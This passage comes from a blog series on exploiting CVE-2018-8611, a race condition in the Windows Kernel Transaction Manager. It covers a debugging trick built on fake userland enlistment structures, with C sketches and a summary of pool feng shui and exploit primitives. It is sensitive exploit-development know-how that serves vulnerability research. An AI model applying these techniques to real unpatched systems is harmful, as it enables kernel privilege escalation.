    else if ( !bEnlistmentSuperior && ADJ(pEnlistment)->Transaction->State == KTransactionCommitted
           || (state = ADJ(pEnlistment)->Transaction->State, state == KTransactionInDoubt)
           || state == KTransactionPrepared ) {
        bSendNotification = 1;
        NotificationMask = TRANSACTION_NOTIFY_RECOVER;
    }

    // Cleared for every notifiable enlistment processed
    ADJ(pEnlistment)->Flags &= ~KENLISTMENT_IS_NOTIFIABLE;
}
```

Since we never legitimately use a _KENLISTMENT in ring 0 that has the KENLISTMENT_SUPERIOR flag set, hitting this code means we must be referencing one of our fake userland _KENLISTMENTs. As such, we set a breakpoint at [a] and, in the enlistment we want to debug, we set KENLISTMENT_IS_NOTIFIABLE and KENLISTMENT_SUPERIOR, and point the _KENLISTMENT.Transaction member to a fake _KTRANSACTION whose state is KTransactionPrepared or KTransactionInDoubt. This will be the only parsed enlistment that reaches this code, so when the breakpoint fires we know we are on a userland enlistment, and specifically the one we want to debug.
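The setup can be sketched in userland as below, together with a mirror of the first branch of the decompiled check to show why only this enlistment reaches [a]. The types are hypothetical simplifications, the flag values are placeholders, and the `_KTRANSACTION_STATE` values are assumptions that should be verified on the target (for example with `dt nt!_KTRANSACTION_STATE` in WinDbg). The offset of [a] inside TmRecoverResourceManager() also depends on the build.

```c
#include <stdbool.h>
#include <stdint.h>

/* Placeholder flag values (assumption): take them from the target build. */
#define KENLISTMENT_SUPERIOR      0x01u
#define KENLISTMENT_IS_NOTIFIABLE 0x80u

/* Assumed _KTRANSACTION_STATE values for the two states we need. */
enum { KTransactionPrepared = 3, KTransactionInDoubt = 4 };

/* Hypothetical simplified fake kernel objects. */
typedef struct FAKE_TRANSACTION {
    uint32_t State;
} FAKE_TRANSACTION;

typedef struct FAKE_ENLISTMENT {
    struct FAKE_ENLISTMENT *Next;
    uint32_t Flags;
    FAKE_TRANSACTION *Transaction;
} FAKE_ENLISTMENT;

/* Turn e into a 'debug' enlistment that takes the branch marked [a]. */
static void make_debug_enlistment(FAKE_ENLISTMENT *e, FAKE_TRANSACTION *tx)
{
    tx->State = KTransactionPrepared; /* KTransactionInDoubt also works */
    e->Transaction = tx;
    e->Flags |= KENLISTMENT_IS_NOTIFIABLE | KENLISTMENT_SUPERIOR;
}

/* Userland mirror of the first branch of the decompiled check:
 * true when the kernel would execute the line marked [a]. */
static bool reaches_breakpoint_a(const FAKE_ENLISTMENT *e)
{
    if (!(e->Flags & KENLISTMENT_IS_NOTIFIABLE))
        return false;
    if (!(e->Flags & KENLISTMENT_SUPERIOR))
        return false;
    return e->Transaction->State == KTransactionPrepared ||
           e->Transaction->State == KTransactionInDoubt;
}
```

An enlistment that is notifiable but not superior fails the second test, which is why the breakpoint stays silent for every other enlistment.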

The following diagram illustrates this:

If you are developing an exploit and want to debug the parsing of a specific userland enlistment, simply inject such a ‘debug’ enlistment just before it is parsed, or mark the enlistment you want to debug with these flags.
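Injecting a debug enlistment in front of a target can be sketched as a simple list splice. As before, `FAKE_ENLISTMENT`, `FAKE_TRANSACTION` and `inject_debug_before()` are hypothetical, and the flag and state values are placeholders. The forward link of the debug enlistment is written before it is published through `prev->Next`, so a recovery thread walking the list never sees a half-initialised entry.

```c
#include <stdint.h>

#define KENLISTMENT_SUPERIOR      0x01u /* placeholder value (assumption) */
#define KENLISTMENT_IS_NOTIFIABLE 0x80u /* placeholder value (assumption) */
enum { KTransactionPrepared = 3 };      /* assumed enum value */

/* Hypothetical simplified fake kernel objects. */
typedef struct FAKE_TRANSACTION {
    uint32_t State;
} FAKE_TRANSACTION;

typedef struct FAKE_ENLISTMENT {
    struct FAKE_ENLISTMENT *Next;
    uint32_t Flags;
    FAKE_TRANSACTION *Transaction;
} FAKE_ENLISTMENT;

/* Splice dbg between prev and prev->Next so that the breakpoint at [a]
 * fires just before the enlistment we care about is parsed. */
static void inject_debug_before(FAKE_ENLISTMENT *prev, FAKE_ENLISTMENT *dbg,
                                FAKE_TRANSACTION *tx)
{
    tx->State = KTransactionPrepared;
    dbg->Transaction = tx;
    dbg->Flags = KENLISTMENT_IS_NOTIFIABLE | KENLISTMENT_SUPERIOR;
    dbg->Next = prev->Next; /* link forward first ...          */
    prev->Next = dbg;       /* ... then make it reachable       */
}
```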

Conclusion

In this part, we have described how to win the race condition without the help of a debugger, and how to choose which enlistment to free so that the race is won more efficiently. We also described the non-paged pool feng shui we used to create an ideal memory layout and replace a freed enlistment with controlled data. Finally, we showed how we can make the recovery thread stay in the TmRecoverResourceManager() loop in order to trigger additional exploit primitives, and we described some debugging tricks we made heavy use of while working on the remaining parts of the exploit. We have not yet described the read/write primitives that we will execute; they will be the topic of part 4 of this blog series.

Read all posts in the Exploiting Windows KTM series

- CVE-2018-8611 Exploiting Windows KTM Part 1/5 – Introduction

- CVE-2018-8611 Exploiting Windows KTM Part 2/5 – Patch analysis and basic triggering

- CVE-2018-8611 Exploiting Windows KTM Part 3/5 – Triggering the race condition and debugging tricks

- CVE-2018-8611 Exploiting Windows KTM Part 4/5 – From race win to kernel read and write primitive

- CVE-2018-8611 Exploiting Windows KTM Part 5/5 – Vulnerability detection and a better read/write primitive